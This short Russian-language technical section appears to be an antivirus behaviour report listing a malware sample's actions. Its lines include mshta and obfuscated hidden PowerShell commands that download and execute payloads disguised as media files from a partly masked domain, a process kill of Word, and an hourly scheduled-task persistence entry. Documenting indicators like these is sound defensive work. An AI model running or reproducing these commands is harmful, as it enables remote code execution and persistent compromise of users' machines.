Техническая информация
- <SYSTEM32>\tasks\microsoftcdt
- '<SYSTEM32>\taskkill.exe' /f /im WINWORD.EXE
- '<SYSTEM32>\mshta.exe' http://om###ficer.com/cgi/pocazoi.mp3
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
- %APPDATA%\desktop.ini.bat
- http://om###ficer.com/cgi/pocazoi.mp3
- http://om###ficer.com/cgi/asynk.jpg
- http://om###ficer.com/cgi/battarefa.jpg
- http://om###ficer.com/cgi/bat.mp3
- DNS ASK om###ficer.com
- ClassName: '' WindowName: ''
- '<SYSTEM32>\mshta.exe' http://om###ficer.com/cgi/pocazoi.mp3' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\Desktop.ini.bat" "
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 60 /tn ""MicrosoftCDT"" /tr ""\""mshta\""http://om###ficer.com/cgi/msgbox.mp3"" /F